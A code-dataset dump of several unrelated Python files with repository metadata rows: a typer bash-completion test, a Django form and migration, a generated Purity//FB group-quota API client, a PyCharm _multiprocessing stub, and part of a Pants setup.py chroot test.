bash_completion_path: Path = Path.home() / ".bash_completion"
text = ""
if bash_completion_path.is_file():
text = bash_completion_path.read_text()
result = subprocess.run(
[
"bash",
"-c",
f"{sys.executable} -m coverage run {mod.__file__} --install-completion",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
env={**os.environ, "SHELL": "/bin/bash"},
)
new_text = bash_completion_path.read_text()
bash_completion_path.write_text(text)
assert "_TUTORIAL001.PY_COMPLETE=complete-bash" in new_text
assert "completion installed in" in result.stdout
assert "Completion will take effect once you restart the terminal." in result.stdout
| [
"[email protected]"
] | |
e87ab2c053552be6df6333daf37c54e1c4e56527 | 3adf9934a74077c328b9a0afff37f8ca355eead1 | /comicresizer/forms.py | a2f083f2fd6d9a8ab0f950d16e2e7b6010e34b3e | [] | no_license | jgasteiz/comic-resizer | 36671623fe9909f23fba793b44cf4ac56380926a | 12d2e12efdf2017746d67a4b6d9616613ee58bb9 | refs/heads/master | 2021-07-05T05:56:00.911958 | 2017-09-27T07:43:58 | 2017-09-27T07:45:25 | 104,987,910 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 105 | py | from django import forms
class ComicUploadForm(forms.Form):
file = forms.FileField(required=False)
| [
"[email protected]"
] | |
94540c0cfc7509d41aeaeedc64a11096d5b2616a | 81d955c3ac886e690ceb01026ed769b1784dbef9 | /purity_fb/purity_fb_1dot8/apis/quotas_groups_api.py | 665498e5f3f9ea81a3c569698b958f1cb115c367 | [
"Apache-2.0"
] | permissive | etsangsplk/purity_fb_python_client | bc525ef1a18f6a79c1536cb4519a7efd58d09d89 | 0807a0fa2eab273bc08f73266d9cda9fa33b37bd | refs/heads/master | 2020-06-03T05:49:03.015147 | 2019-05-16T06:11:40 | 2019-05-16T06:11:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 26,547 | py | # coding: utf-8
"""
Purity//FB REST Client
Client for Purity//FB REST API (1.0 - 1.8), developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.8
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class QuotasGroupsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_group_quotas(self, **kwargs):
"""
Create a new group quota
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_group_quotas_with_http_info(**kwargs)
else:
(data) = self.create_group_quotas_with_http_info(**kwargs)
return data
def create_group_quotas_with_http_info(self, **kwargs):
"""
Create a new group quota
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['file_system_names', 'gids', 'group_names', 'quota']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'quota' in params:
body_params = params['quota']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_group_quotas(self, **kwargs):
"""
        Delete group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_group_quotas_with_http_info(**kwargs)
else:
(data) = self.delete_group_quotas_with_http_info(**kwargs)
return data
def delete_group_quotas_with_http_info(self, **kwargs):
"""
        Delete group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'file_system_names', 'gids', 'group_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_group_quotas(self, **kwargs):
"""
A list of quota group entries
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param str sort: The way to order the results.
:param int start: start
:param str token: token
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_group_quotas_with_http_info(**kwargs)
else:
(data) = self.list_group_quotas_with_http_info(**kwargs)
return data
def list_group_quotas_with_http_info(self, **kwargs):
"""
A list of quota group entries
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param str filter: The filter to be used for query.
:param int limit: limit, should be >= 0
:param str sort: The way to order the results.
:param int start: start
:param str token: token
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'filter', 'limit', 'sort', 'start', 'token', 'file_system_names', 'gids', 'group_names']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'filter' in params:
query_params.append(('filter', params['filter']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'sort' in params:
query_params.append(('sort', params['sort']))
if 'start' in params:
query_params.append(('start', params['start']))
if 'token' in params:
query_params.append(('token', params['token']))
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_group_quotas(self, **kwargs):
"""
Update existing group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_group_quotas_with_http_info(**kwargs)
else:
(data) = self.update_group_quotas_with_http_info(**kwargs)
return data
def update_group_quotas_with_http_info(self, **kwargs):
"""
Update existing group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'file_system_names', 'gids', 'group_names', 'quota']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'quota' in params:
body_params = params['quota']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
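# ---------------------------------------------------------------------------
# Illustrative usage sketch -- not emitted by the Swagger code generator. It
# assumes an ApiClient/Configuration whose host and AuthTokenHeader token were
# set up elsewhere; 'fs1' is a placeholder file system name.
if __name__ == '__main__':
    def _print_response(resp):
        # invoked on the worker thread with the QuotasGroupResponse
        sys.stdout.write('%s\n' % resp)

    _api = QuotasGroupsApi()  # falls back to the shared default ApiClient
    _sync_result = _api.list_group_quotas(file_system_names=['fs1'], limit=5)
    _async_thread = _api.list_group_quotas(callback=_print_response)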
| [
"[email protected]"
] | |
ba86f9ca658290dd2ff911890bc481e0c6568938 | 82e7b27cc4377def80c2b475645d502e40a0e498 | /newsletter/migrations/0009_auto_20160215_0258.py | d627d656950946d66269e848a6dd0b1a53943507 | [] | no_license | craYBoi/bryte | 850698e735a08ea10a08a78dc9e23b7e760c682f | d2b5a74d200ccb06cc3ef4e3180b83cbc338ce3e | refs/heads/master | 2022-12-12T08:54:56.863372 | 2017-06-28T05:03:32 | 2017-06-28T05:03:32 | 63,019,677 | 0 | 0 | null | 2022-11-22T01:00:25 | 2016-07-10T21:44:41 | CSS | UTF-8 | Python | false | false | 475 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-02-15 02:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('newsletter', '0008_auto_20160215_0249'),
]
operations = [
migrations.AlterField(
model_name='price',
name='price',
field=models.PositiveSmallIntegerField(blank=True, null=True),
),
]
| [
"[email protected]"
] | |
bbd48bd8cb59d48d867df4dbad5af7cf9a4a87d6 | 085ce75a507df6e755cabb7a65c4a2a8c98762ba | /dockerfiles/root/.pycharm_helpers/python_stubs/-252567642/_multiprocessing.py | fee21a8eebfb053e451fc85ad0c04b02fa80eb4e | [] | no_license | Arhzi/habr-docker-article | d44302db1fe157d81fe0818e762e82218f50e31f | 6fb094860b612e307beadaeb22981aa0ee64e964 | refs/heads/master | 2021-01-23T20:41:47.398025 | 2015-12-10T08:56:33 | 2015-12-10T08:56:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,156 | py | # encoding: utf-8
# module _multiprocessing
# from /usr/local/lib/python2.7/lib-dynload/_multiprocessing.so
# by generator 1.137
# no doc
# no imports
# functions
def address_of_buffer(obj): # real signature unknown; restored from __doc__
"""
address_of_buffer(obj) -> int
    Return address of obj assuming obj supports the buffer interface
"""
return 0
def recvfd(sockfd): # real signature unknown; restored from __doc__
"""
recvfd(sockfd) -> fd
Receive a file descriptor over a unix domain socket
    whose file descriptor is sockfd
"""
pass
def sendfd(sockfd, fd): # real signature unknown; restored from __doc__
"""
sendfd(sockfd, fd) -> None
Send file descriptor given by fd over the unix domain socket
whose file decriptor is sockfd
"""
pass
# classes
class Connection(object):
"""
Connection type whose constructor signature is
Connection(handle, readable=True, writable=True).
The constructor does *not* duplicate the handle.
"""
def close(self, *args, **kwargs): # real signature unknown
""" close the connection """
pass
def fileno(self, *args, **kwargs): # real signature unknown
""" file descriptor or handle of the connection """
pass
def poll(self, *args, **kwargs): # real signature unknown
""" whether there is any input available to be read """
pass
def recv(self, *args, **kwargs): # real signature unknown
""" receive a (picklable) object """
pass
def recv_bytes(self, *args, **kwargs): # real signature unknown
""" receive byte data as a string """
pass
def recv_bytes_into(self, *args, **kwargs): # real signature unknown
"""
receive byte data into a writeable buffer-like object
returns the number of bytes read
"""
pass
def send(self, *args, **kwargs): # real signature unknown
""" send a (picklable) object """
pass
def send_bytes(self, *args, **kwargs): # real signature unknown
""" send the byte data from a readable buffer-like object """
pass
def __init__(self, handle, readable=True, writable=True): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
closed = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is closed"""
readable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is readable"""
writable = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""True if the connection is writable"""
class SemLock(object):
""" Semaphore/Mutex type """
def acquire(self, *args, **kwargs): # real signature unknown
""" acquire the semaphore/lock """
pass
def release(self, *args, **kwargs): # real signature unknown
""" release the semaphore/lock """
pass
def _after_fork(self, *args, **kwargs): # real signature unknown
""" rezero the net acquisition count after fork() """
pass
def _count(self, *args, **kwargs): # real signature unknown
""" num of `acquire()`s minus num of `release()`s for this process """
pass
def _get_value(self, *args, **kwargs): # real signature unknown
""" get the value of the semaphore """
pass
def _is_mine(self, *args, **kwargs): # real signature unknown
""" whether the lock is owned by this thread """
pass
def _is_zero(self, *args, **kwargs): # real signature unknown
""" returns whether semaphore has value zero """
pass
@classmethod
def _rebuild(cls, *args, **kwargs): # real signature unknown
""" """
pass
def __enter__(self, *args, **kwargs): # real signature unknown
""" enter the semaphore/lock """
pass
def __exit__(self, *args, **kwargs): # real signature unknown
""" exit the semaphore/lock """
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
handle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
kind = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
maxvalue = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
SEM_VALUE_MAX = 2147483647L
# variables with complex values
flags = {
'HAVE_FD_TRANSFER': 1,
'HAVE_SEM_OPEN': 1,
'HAVE_SEM_TIMEDWAIT': 1,
}
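# ---------------------------------------------------------------------------
# Illustrative note (not produced by the stub generator): sendfd/recvfd
# implement SCM_RIGHTS file-descriptor passing over AF_UNIX sockets. A minimal
# sketch, assuming two cooperating processes that share a socketpair and a
# hypothetical file:
#
#   import os, socket
#   parent_sock, child_sock = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
#   fd = os.open('/tmp/example.txt', os.O_RDONLY)
#   sendfd(parent_sock.fileno(), fd)              # sender side
#   duplicate_fd = recvfd(child_sock.fileno())    # receiver side gets a new fd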
| [
"[email protected]"
] | |
208a1844a81ead0571afc60c1414be53b9b0f78c | 05352c29e844705f02d65526343eea9b486f8bd7 | /src/python/pants/backend/python/rules/run_setup_py_test.py | 001faa56b7b0e7fd0e62305736c4abe5951844de | [
"Apache-2.0"
] | permissive | DoN-SultaN/pants | af2557de1178faaf73eed0a5a32e8f6fd34d2169 | 5cb5379003a0674c51f9a53f582cf690eddfaf45 | refs/heads/master | 2022-10-15T04:18:54.759839 | 2020-06-13T10:04:21 | 2020-06-13T10:04:21 | 272,089,524 | 1 | 0 | Apache-2.0 | 2020-06-13T21:36:50 | 2020-06-13T21:36:49 | null | UTF-8 | Python | false | false | 27,011 | py | # Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import json
import textwrap
from typing import Iterable, Type
import pytest
from pants.backend.python.python_artifact import PythonArtifact
from pants.backend.python.rules.run_setup_py import (
AmbiguousOwnerError,
AncestorInitPyFiles,
DependencyOwner,
ExportedTarget,
ExportedTargetRequirements,
InvalidEntryPoint,
InvalidSetupPyArgs,
NoOwnerError,
OwnedDependencies,
OwnedDependency,
SetupPyChroot,
SetupPyChrootRequest,
SetupPySources,
SetupPySourcesRequest,
generate_chroot,
get_ancestor_init_py,
get_exporting_owner,
get_owned_dependencies,
get_requirements,
get_sources,
validate_args,
)
from pants.backend.python.target_types import PythonBinary, PythonLibrary, PythonRequirementLibrary
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.core.target_types import Resources
from pants.core.util_rules.determine_source_files import rules as determine_source_files_rules
from pants.core.util_rules.strip_source_roots import rules as strip_source_roots_rules
from pants.engine.addresses import Address
from pants.engine.fs import Snapshot
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.rules import RootRule
from pants.engine.selectors import Params
from pants.engine.target import Target, Targets, WrappedTarget
from pants.python.python_requirement import PythonRequirement
from pants.source.source_root import SourceRootConfig
from pants.testutil.option.util import create_options_bootstrapper
from pants.testutil.subsystem.util import init_subsystem
from pants.testutil.test_base import TestBase
_namespace_decl = "__import__('pkg_resources').declare_namespace(__name__)"
class TestSetupPyBase(TestBase):
@classmethod
def alias_groups(cls) -> BuildFileAliases:
return BuildFileAliases(
objects={"python_requirement": PythonRequirement, "setup_py": PythonArtifact}
)
@classmethod
def target_types(cls):
return [PythonBinary, PythonLibrary, PythonRequirementLibrary, Resources]
def tgt(self, addr: str) -> Target:
return self.request_single_product(WrappedTarget, Params(Address.parse(addr))).target
def init_source_root():
init_subsystem(SourceRootConfig, options={"source": {"root_patterns": ["src/python"]}})
class TestGenerateChroot(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
generate_chroot,
get_sources,
get_requirements,
get_ancestor_init_py,
get_owned_dependencies,
get_exporting_owner,
RootRule(SetupPyChrootRequest),
*determine_source_files_rules(),
*strip_source_roots_rules(),
]
def assert_chroot(self, expected_files, expected_setup_kwargs, addr):
chroot = self.request_single_product(
SetupPyChroot,
Params(
SetupPyChrootRequest(ExportedTarget(self.tgt(addr)), py2=False),
create_options_bootstrapper(args=["--source-root-patterns=src/python"]),
),
)
snapshot = self.request_single_product(Snapshot, Params(chroot.digest))
assert sorted(expected_files) == sorted(snapshot.files)
kwargs = json.loads(chroot.setup_keywords_json)
assert expected_setup_kwargs == kwargs
def assert_error(self, addr: str, exc_cls: Type[Exception]):
with pytest.raises(ExecutionError) as excinfo:
self.request_single_product(
SetupPyChroot,
Params(
SetupPyChrootRequest(ExportedTarget(self.tgt(addr)), py2=False),
create_options_bootstrapper(args=["--source-root-patterns=src/python"]),
),
)
ex = excinfo.value
assert len(ex.wrapped_exceptions) == 1
assert type(ex.wrapped_exceptions[0]) == exc_cls
def test_generate_chroot(self) -> None:
init_source_root()
self.create_file(
"src/python/foo/bar/baz/BUILD",
"python_library(provides=setup_py(name='baz', version='1.1.1'))",
)
self.create_file("src/python/foo/bar/baz/baz.py", "")
self.create_file(
"src/python/foo/qux/BUILD",
textwrap.dedent(
"""
python_library()
python_binary(name="bin", entry_point="foo.qux.bin")
"""
),
)
self.create_file("src/python/foo/qux/__init__.py", "")
self.create_file("src/python/foo/qux/qux.py", "")
self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["js/code.js"])')
self.create_file("src/python/foo/resources/js/code.js", "")
self.create_file(
"src/python/foo/BUILD",
textwrap.dedent(
"""
python_library(
dependencies=[
'src/python/foo/bar/baz',
'src/python/foo/qux',
'src/python/foo/resources',
],
provides=setup_py(
name='foo', version='1.2.3'
).with_binaries(
foo_main='src/python/foo/qux:bin'
)
)
"""
),
)
self.create_file("src/python/foo/__init__.py", _namespace_decl)
self.create_file("src/python/foo/foo.py", "")
self.assert_chroot(
[
"src/foo/qux/__init__.py",
"src/foo/qux/qux.py",
"src/foo/resources/js/code.js",
"src/foo/__init__.py",
"src/foo/foo.py",
"setup.py",
"MANIFEST.in",
],
{
"name": "foo",
"version": "1.2.3",
"package_dir": {"": "src"},
"packages": ["foo", "foo.qux"],
"namespace_packages": ["foo"],
"package_data": {"foo": ["resources/js/code.js"]},
"install_requires": ["baz==1.1.1"],
"entry_points": {"console_scripts": ["foo_main=foo.qux.bin"]},
},
"src/python/foo",
)
def test_invalid_binary(self) -> None:
init_source_root()
self.create_file(
"src/python/invalid_binary/BUILD",
textwrap.dedent(
"""
python_library(name='not_a_binary', sources=[])
python_binary(name='no_entrypoint')
python_library(
name='invalid_bin1',
sources=[],
provides=setup_py(
name='invalid_bin1', version='1.1.1'
).with_binaries(foo=':not_a_binary')
)
python_library(
name='invalid_bin2',
sources=[],
provides=setup_py(
name='invalid_bin2', version='1.1.1'
).with_binaries(foo=':no_entrypoint')
)
"""
),
)
self.assert_error("src/python/invalid_binary:invalid_bin1", InvalidEntryPoint)
self.assert_error("src/python/invalid_binary:invalid_bin2", InvalidEntryPoint)
class TestGetSources(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
get_sources,
get_ancestor_init_py,
RootRule(SetupPySourcesRequest),
RootRule(SourceRootConfig),
*determine_source_files_rules(),
*strip_source_roots_rules(),
]
def assert_sources(
self,
expected_files,
expected_packages,
expected_namespace_packages,
expected_package_data,
addrs,
):
srcs = self.request_single_product(
SetupPySources,
Params(
SetupPySourcesRequest(Targets([self.tgt(addr) for addr in addrs]), py2=False),
SourceRootConfig.global_instance(),
),
)
chroot_snapshot = self.request_single_product(Snapshot, Params(srcs.digest))
assert sorted(expected_files) == sorted(chroot_snapshot.files)
assert sorted(expected_packages) == sorted(srcs.packages)
assert sorted(expected_namespace_packages) == sorted(srcs.namespace_packages)
assert expected_package_data == dict(srcs.package_data)
def test_get_sources(self) -> None:
init_source_root()
self.create_file(
"src/python/foo/bar/baz/BUILD",
textwrap.dedent(
"""
python_library(name='baz1', sources=['baz1.py'])
python_library(name='baz2', sources=['baz2.py'])
"""
),
)
self.create_file("src/python/foo/bar/baz/baz1.py", "")
self.create_file("src/python/foo/bar/baz/baz2.py", "")
self.create_file("src/python/foo/bar/__init__.py", _namespace_decl)
self.create_file("src/python/foo/qux/BUILD", "python_library()")
self.create_file("src/python/foo/qux/__init__.py", "")
self.create_file("src/python/foo/qux/qux.py", "")
self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["js/code.js"])')
